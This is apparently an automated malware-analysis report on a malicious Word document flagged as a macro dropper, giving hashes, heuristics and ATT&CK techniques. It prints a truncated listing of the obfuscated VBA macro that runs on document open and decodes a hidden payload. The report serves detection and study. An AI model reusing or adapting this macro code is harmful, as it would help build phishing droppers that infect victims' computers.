Office (OLE) malware analysis — malicious · 8cb61f7a1dcc6d66

MALICIOUS

Office (OLE)

218.5 KB Created: 2017-11-14 13:16:00 Authoring application: Microsoft Office Word First seen: 2017-11-20

MD5: 201e7d2d54f711d16601f513b2de7d33 SHA-1: f6c0af383b19ed88a5b38f11deee18c747da66dd SHA-256: 8cb61f7a1dcc6d66e2cab537313e710ce25c657b2f9d3222ba7cbd781e8be613

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6387646-0. It contains a VBA macro within the Document_Open event, which is a common technique for executing malicious code upon opening the document. The macro's obfuscated nature and the presence of a large slack space in the OLE structure suggest it is designed to download and execute a secondary payload.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6387646-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6387646-0
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 223,728 bytes but its declared streams total only 130,417 bytes — 93,311 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11680 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11680 bytes
SHA-256: `1197c32d595cfbe4c2c86431efac1f8fe0f948ac7bf1bf92a37fac5c14faab67`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function hominoid() Dim bisulcated As Byte Dim carnivore As Integer fibrocalcific.penmanship.Value = Day(#12/5/2013#) varday = therapeutics = "impulsiveness" foundered = "decampment" antisocial = proximate certified = "stockman" alula = "splatter" lycaena = against counteroffer = "similarly" courtelle = "huntington" Set apodidae = fibrocalcific.penmanship.SelectedItem admiralty = 43 + 40 Pmt 0, admiralty, 27945, 16250, 2 privateer = apodidae.Name donee = 114 - 59 + 7789 animallike = Right(privateer, donee) omnifarious = converted(animallike) clap = 4 + 51 Pmt 0, clap, 9684, 37824, 2 kismet = "aspergillosis" baldacchino = "lygaeidae" #If (105 - 82 + 377 + 74 - 27 + 253) > ((91 - 23 + 252) - (101 - 87 + 526) * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim worrying As Variant Dim ravenous As LongPtr Dim anisoptera As LongPtr Dim compo As Integer Dim gecko As Long Dim desmidium As LongPtr Dim buttonhole As LongPtr Dim yager As LongPtr bacchanal = 76 - 80 + 2068 #End If #If (105 - 82 + 377 + 74 - 27 + 253) > ((91 - 23 + 252) - (101 - 87 + 526) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim chronologer As Byte Dim anisoptera As Long Dim finetoothed As String Dim ravenous As Long Dim desmidium As Long millenarianism = 47 - 44 + 778 Dim buttonhole As Long Dim yager As Long bacchanal = millenarianism + 3459 #End If knobble = 46 - 56 + 10 detritus = "conilurus" beneficially = 17 - 100 + 4179 ascend = 40 + 38 Pmt 0, ascend, 35503, 42179, 4 combed = partout concise = "straightbacked" seines = "dairying" hypsiprymnodon = 37 + 38 Pmt 0, hypsiprymnodon, 27591, 53253, 2 miscue = omnifarious victim = "abomination" ravenous = scrap(miscue) gastrocybe = embolismal bountiful = "epithalamium" Dim intentionality As Integer Dim innkeeper As Integer desmidium = 8 - 25 + 17 anisoptera = ravenous + bacchanal buttonhole = 91 - 60 + 201496 yager = 68 - 120 + 3552 accompanied = autosomal(buttonhole, desmidium, anisoptera, desmidium, desmidium, desmidium, desmidium) odzookens = 22 + 33 Pmt 0, odzookens, 28400, 15052, 2 End Function Function converted(grimy) As String Dim rewarding() As Byte Dim pianistic As Long Dim brassard(63) As Long Dim cloisters(63) As Long Dim achromatin As Long Dim bibliography(6962) As Byte Dim arguer As Long Dim prophet As Long Dim bargee(63) As Long fame = 17 - 95 + 65358 metaphrastic = 114 - 18 + 65440 fracas = 99 - 12 + 16711593 nix = 86 - 106 + 276 anorthite = 128 - 28 - 36 meristem = 128 - 44 + 262060 historiography = 1 - 48 + 302 biologically = 56 - 76 + 4116 Dim sanitaire As String Dim centipede() As Byte centipede = VBA.StrConv(grimy, 128) hiccup = 3 + 12 Pmt 0, hiccup, 22358, 49698, 7 napier = 7840 + 3 heads = vbKeyShift - 12 For carcharhinidae = (3 - 3) To napier If carcharhinidae Mod (3 - 1) = (4 - 4) Then centipede(carcharhinidae) = centipede(carcharhinidae) - heads ElseIf 1 = 1 Then centipede(carcharhinidae) = centipede(carcharhinidae) - (heads - 1) End If Next carcharhinidae serve = 22 + 33 Pmt 0, serve, 13227, 52276, 8 forewarn = genera For arguer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) bargee(arguer) = ascites(arguer, anorthite, 50 + 3) cloisters(arguer) = ascites(arguer, biologically, 50 + 3) brassard(arguer) = ascites(arguer, meristem, 50 + 3) Next arguer Brightness = 57 + 18 Pmt 0, Brightness, 27386, 20261, 4 rewarding = centipede academical = 47 + 22 Pmt 0, academical, 18094, 33596, 2 purposive = 19 - 76 + 60 missive = 121 - 120 + 1 For prophet = (5 - 5) To napier botch = rewarding(prophet) covert = rewarding(prophet + 2) bouffant = cloisters(forewarn(rewarding(prophet + 1))) escalation = bargee(forewarn(covert)) + forewarn(rewarding(prophet + purposive)) pianistic = brassard(forewarn(botch)) + bouffa ... (truncated)

SHA-256: 1197c32d595cfbe4c2c86431efac1f8fe0f948ac7bf1bf92a37fac5c14faab67

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hominoid()
Dim bisulcated As Byte
Dim carnivore As Integer
fibrocalcific.penmanship.Value = Day(#12/5/2013#)
varday = therapeutics = "impulsiveness"
foundered = "decampment"
antisocial = proximate
certified = "stockman"
alula = "splatter"
lycaena = against
counteroffer = "similarly"
courtelle = "huntington"
Set apodidae = fibrocalcific.penmanship.SelectedItem
admiralty = 43 + 40
Pmt 0, admiralty, 27945, 16250, 2
privateer = apodidae.Name
donee = 114 - 59 + 7789
animallike = Right(privateer, donee)
omnifarious = converted(animallike)
clap = 4 + 51
Pmt 0, clap, 9684, 37824, 2
kismet = "aspergillosis"
baldacchino = "lygaeidae"
#If (105 - 82 + 377 + 74 - 27 + 253) > ((91 - 23 + 252) - (101 - 87 + 526) * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim worrying As Variant
Dim ravenous As LongPtr
Dim anisoptera As LongPtr
Dim compo As Integer
Dim gecko As Long
Dim desmidium As LongPtr
Dim buttonhole As LongPtr
Dim yager As LongPtr
bacchanal = 76 - 80 + 2068
#End If
#If (105 - 82 + 377 + 74 - 27 + 253) > ((91 - 23 + 252) - (101 - 87 + 526) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim chronologer As Byte
Dim anisoptera As Long
Dim finetoothed As String
Dim ravenous As Long
Dim desmidium As Long
millenarianism = 47 - 44 + 778
Dim buttonhole As Long
Dim yager As Long
bacchanal = millenarianism + 3459
#End If
knobble = 46 - 56 + 10
detritus = "conilurus"
beneficially = 17 - 100 + 4179
ascend = 40 + 38
Pmt 0, ascend, 35503, 42179, 4
combed = partout
concise = "straightbacked"
seines = "dairying"
hypsiprymnodon = 37 + 38
Pmt 0, hypsiprymnodon, 27591, 53253, 2
miscue = omnifarious
victim = "abomination"
ravenous = scrap(miscue)
gastrocybe = embolismal
bountiful = "epithalamium"
Dim intentionality As Integer
Dim innkeeper As Integer
desmidium = 8 - 25 + 17
anisoptera = ravenous + bacchanal
buttonhole = 91 - 60 + 201496
yager = 68 - 120 + 3552
accompanied = autosomal(buttonhole, desmidium, anisoptera, desmidium, desmidium, desmidium, desmidium)
odzookens = 22 + 33
Pmt 0, odzookens, 28400, 15052, 2
End Function
Function converted(grimy) As String
Dim rewarding() As Byte
Dim pianistic As Long
Dim brassard(63) As Long
Dim cloisters(63) As Long
Dim achromatin As Long
Dim bibliography(6962) As Byte
Dim arguer As Long
Dim prophet As Long
Dim bargee(63) As Long
fame = 17 - 95 + 65358
metaphrastic = 114 - 18 + 65440
fracas = 99 - 12 + 16711593
nix = 86 - 106 + 276
anorthite = 128 - 28 - 36
meristem = 128 - 44 + 262060
historiography = 1 - 48 + 302
biologically = 56 - 76 + 4116
Dim sanitaire As String
Dim centipede() As Byte
centipede = VBA.StrConv(grimy, 128)
hiccup = 3 + 12
Pmt 0, hiccup, 22358, 49698, 7
napier = 7840 + 3
heads = vbKeyShift - 12
For carcharhinidae = (3 - 3) To napier
If carcharhinidae Mod (3 - 1) = (4 - 4) Then
centipede(carcharhinidae) = centipede(carcharhinidae) - heads
ElseIf 1 = 1 Then
centipede(carcharhinidae) = centipede(carcharhinidae) - (heads - 1)
End If
Next carcharhinidae
serve = 22 + 33
Pmt 0, serve, 13227, 52276, 8
forewarn = genera
For arguer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
bargee(arguer) = ascites(arguer, anorthite, 50 + 3)
cloisters(arguer) = ascites(arguer, biologically, 50 + 3)
brassard(arguer) = ascites(arguer, meristem, 50 + 3)
Next arguer
Brightness = 57 + 18
Pmt 0, Brightness, 27386, 20261, 4
rewarding = centipede
academical = 47 + 22
Pmt 0, academical, 18094, 33596, 2
purposive = 19 - 76 + 60
missive = 121 - 120 + 1
For prophet = (5 - 5) To napier
botch = rewarding(prophet)
covert = rewarding(prophet + 2)
bouffant = cloisters(forewarn(rewarding(prophet + 1)))
escalation = bargee(forewarn(covert)) + forewarn(rewarding(prophet + purposive))
pianistic = brassard(forewarn(botch)) + bouffa
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.